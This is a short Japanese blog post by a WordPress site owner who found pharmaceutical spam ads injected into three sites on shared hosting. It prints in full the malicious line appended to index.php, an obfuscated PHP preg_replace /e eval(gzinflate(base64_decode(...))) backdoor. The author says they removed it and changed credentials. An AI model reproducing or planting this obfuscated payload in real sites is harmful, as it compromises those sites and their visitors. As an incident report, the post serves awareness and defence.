ワードプレスに知らない広告を挿入された

2016/03/09

ロリポップで使用中のワードプレスに知らない広告が表示されてた。
右上の方に追尾バナーとして表示されてたバナーはコレ。

Viagra

バイアグラ売られてた。

改ざんされてたのはindex.phpのファイルで、最後に1行こんなのが足されてた。

<php preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28'lZfNbuRGDITvAfYdDMOH5LIY9a8EY9/ElxmNfdkkC+cQDPL0aRY/WholMLAHYfTT3SSLxSLn6bb+8eN7e3j4+u3h8eXWT+NKL7dWx9VfbvVte7ZvbR3XNK7s79I8rvE9jXXpdVxnv9c3e7/6bx2/fazNbVx199z93d336f655N3zOCvPh/X9/rxy2J+Xw3n18L19Yu/oj/lbPonn//w7xn8872hvf14++JcP9sfacsTvM//af+391H7iS8PvPnJdbf/4bcV5kuGJ5UA4j/tsnGpctm7xc8rgS7v4GXXxtfY99uhd83v5OPmzcbAappHr5mfaWb37Pq2vrBvP3XCanZtl8TM63LEr+Gy+y36C79X5Y1exvcO/dh1rzr7HsDC8zLZdFr/8sFisTsyW1cTF/ZVPYF4661hTi2NcT4/PX355uv31/n5LUZhmVE7NOHvleuWA4gGZ8w3D5pyBrISs7mjPbsx+RfSTG46iFkCrg5QjiLG+JJJ13oA1u+aPAdtYb+QKPyrna93ZwckAbWAaKAK2kMjqCRQxzoD95vttbSN5StrkPshmJRGL+2+kNb/NRmuOkQFu90ZSi9dIoW8XbAVx8m7vjuB2dthXIUwU44z/b46DcIL8tlb4T463ETiz1mJVMU2OUbn4uYaTkbXuiCRbkFXxR5Elx9psyG4Uy8QZ3XlRrsRD8YnU3fOj4p3c93racWj29xXBE8nhkmGhptC9kAoYKPfVY7D9Iv3k/iunE7m/YPtCTGffU8I2+7Q2u11hkZzzZsNiEfbVse272MWxyPUJDCrnpC0nDQ4ZZ2rUT+WX+KMGxMXihXn7/k9ZojCVSIhdAEMGQ/FOblQFMdMdFoBf3bACmSBxRh3OKAqqJbIGwReCQZ1U0Gk7W/syhF1JGvY/SLAjfovkTKwlobI7oZiALSKsLhZS1asn2GLVGQiDSFNRfLr8hxgFcZrbkupzhrBJflU6hUQpux2LSbEEwXkXMZvfnYIKf8zHRhfodRNCiWJzHDKqL9/IjzpB8VjNdxM/YcCUZOsbqm3FUCB/RaSl+Mnjk1i3LbZMwarwy3aWcCV3wqaSF4pIxUfx1OAZgqpug7CrgNN9J1RXDl7S3dXNEkKX6doFDkd35dcKWgIVQj8jrAkbwekTRTVRtAt1kem8J7h84ezzNllYHiVgs7+3/Z1pVDi/ghd+alppXpjv5z9T/eiYF9QRgNWB8gaaAuuQtAMWBalkTYwgkVDUuuzUvERnIqGhXo3kNMApjB+VLhsjUA0ilq0jqPCjwy2MPYiBOllmdGB8bBBEPjOKmb9S/SD4xL6ZEQqhUdxRmBOgQua0Ew/zKYq3MR3oPm9Fp9EnpoogbuFbdOEFXF5R/tX9FoYrik9+MsKoyaeDd97iEa4z3Ty61ImunbYuo+KbyTWFrI5KvkNgNK0wWWXGUCNpDW40x1QFEFPLfmKiSEqMt1eEhxjFOXzt5KEyQcTk1RFeFQriry6fwB2xlb0LokMzEG/geGb600TBfb762H43yi8/8Zzdl/3fOl12/uXx+fXv8++/PvF38utDzK925w3T7lShvz3/Cw=='\x29\x29\x29\x3B","");?>

削除して終了です。
2014/02/26 23:45:00にやられてましたね。

idとpassは一応変更。意味ないだろうけど。

このロリポップで運用しているワードプレス3サイト全部に挿入されてた。


-糞記事